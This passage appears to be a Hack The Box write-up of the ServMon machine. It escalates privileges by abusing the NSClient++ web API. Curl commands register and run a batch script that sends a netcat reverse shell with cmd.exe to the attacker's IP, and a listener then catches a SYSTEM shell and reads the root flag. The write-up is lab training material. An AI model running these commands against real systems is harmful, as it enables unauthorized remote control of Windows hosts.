(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>
NSClient++ Web Server
I found it difficult to access the web server: it is very slow to respond and load due to high network traffic, but I can use cURL to send the requests instead.
Steps to get a reverse shell:
I will transfer my nc.exe using an SMB server and then register a script that calls nc.exe:
root in htb/boxes/ServMon ❯ curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/payas0.bat --data-binary "C:\Temp\nc.exe 10.10.15.151 9001 -e cmd.exe"
Enter host password for user 'admin':
Added payas0 as scripts\payas0.bat
root in htb/boxes/ServMon took 12s ❯
I got the message that my script was added. Next I will set up my netcat listener and execute the script using this request:
root in htb/boxes/ServMon ❯ curl -s -k -u admin https://localhost:8443/api/v1/queries/payas0/commands/execute?time=1m
Enter host password for user 'admin':
After 1 minute I successfully got an admin shell:
# bash
root in htb/boxes/ServMon ❯ nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.15.151] from (UNKNOWN) [10.10.10.184] 52839
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Program Files\NSClient++>
Finally I’ve got the root
# bash
PS C:\Program Files\NSClient++> whoami
whoami
nt authority\system
PS C:\Program Files\NSClient++>
Grab root flag
After getting the admin shell I can now grab the root.txt:
# bash
PS C:\users\Administrator\Desktop> cat root.txt
cat root.txt
64e1-------------------------f274
PS C:\users\Administrator\Desktop>
If you liked my writeup please leave a respect on my Profile
References:
NVMS-1000 Exploit
NSClient++ - Privilege Escalation